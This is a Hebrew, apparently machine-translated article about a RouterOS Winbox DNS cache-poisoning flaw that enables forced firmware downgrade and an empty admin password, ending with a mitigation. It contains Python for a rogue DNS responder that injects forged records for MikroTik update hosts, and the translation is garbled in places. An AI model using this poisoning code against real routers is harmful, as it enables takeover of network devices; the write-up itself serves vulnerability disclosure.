🥇פגיעות של יציאות אחורי ב-RouterOS מסכנת מאות אלפי מכשירים

היכולת לשדרג מרחוק מכשירים המבוססים על RouterOS (Mikrotik) מסכנת מאות אלפי התקני רשת. הפגיעות קשורה להרעלת מטמון ה-DNS של פרוטוקול Winbox ומאפשרת לטעון קושחה מיושנת (עם איפוס ברירת מחדל לסיסמה) או קושחה שעברה שינוי על המכשיר.

פרטי פגיעות

מסוף ה-RouterOS תומך בפקודה resolve לחיפוש DNS.

בקשה זו מטופלת על ידי בינארי בשם פותר. Resolver הוא אחד מניאריים רבים שמתחברים לפרוטוקול Winbox של RouterOS. ברמה גבוהה, ניתן לנתב "הודעות" הנשלחות ליציאת Winbox לבינאריים שונים ב-RouterOS בהתבסס על סכמת מספור מבוססת מערך.

כברירת מחדל, תכונת שרת ה-DNS מושבתת ב-RouterOS.

עם זאת, גם כאשר פונקציית השרת מושבתת, הנתב שומר על מטמון DNS משלו.

כאשר אנו שולחים בקשה באמצעות winbox_dns_request למשל example.com, הנתב ישמור את התוצאה במטמון.

מכיוון שאנו יכולים לציין את שרת ה-DNS שדרכו הבקשה צריכה לעבור, הזנת כתובות שגויות היא טריוויאלית. לדוגמה, אתה יכול להגדיר יישום שרת DNS מ פיליפ קלאוסלהגיב תמיד עם רשומת A המכילה את כתובת ה-IP 192.168.88.250.

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
    print("---- Reply:n", reply)
    return reply.pack()

עכשיו אם אתה מחפש למשל.com באמצעות Winbox, אתה יכול לראות שמטמון ה-DNS של הנתב מורעל.

כמובן, poisoning example.com אינו שימושי במיוחד מכיוון שהנתב לא ישתמש בו בפועל. עם זאת, הנתב צריך לגשת ל- upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com ו-download.mikrotik.com. ובזכות טעות נוספת אפשר להרעיל את כולם בבת אחת.

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
    reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("download.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    print("---- Reply:n", reply)
    return reply.pack()

הנתב מבקש הרשאה אחת, ואנחנו מחזירים חמישה. הנתב לא שומר את כל התגובות הללו בצורה נכונה.

ברור שהתקפה זו שימושית גם אם הנתב פועל כשרת DNS, מכיוון שהיא מאפשרת לתקוף לקוחות של הנתב.

התקפה זו גם מאפשרת לך לנצל פגיעות חמורה יותר: שדרוג לאחור או העברה לאחור של הגרסה של RouterOS. התוקף יוצר מחדש את ההיגיון של שרת העדכונים, כולל יומן השינויים, ומאלץ את RouterOS לתפוס את הגרסה המיושנת (הפגיעה) כעדכנית. הסכנה כאן טמונה בעובדה שכאשר הגרסה "מתעדכנת", סיסמת המנהל מאופסת לערך ברירת המחדל - תוקף יכול להיכנס למערכת עם סיסמה ריקה!

ההתקפה די עובדת, למרות זאת מחבר מיישם עוד כמה וקטורים, כולל אלה הקשורים ל הטמעת דלת אחורית בקושחה, אבל זו כבר טכניקה מיותרת והשימוש בה למטרות לא לגיטימיות אינו חוקי.

הגנה

פשוט השבתת Winbox מאפשרת לך להגן על עצמך מפני התקפות אלה. למרות נוחות הניהול באמצעות Winbox, עדיף להשתמש בפרוטוקול SSH.

מקור: www.habr.com

פגיעות של יציאות אחוריות ב-RouterOS מסכנת מאות אלפי מכשירים

פרטי פגיעות

הגנה

הוספת תגובה ביטול תגובה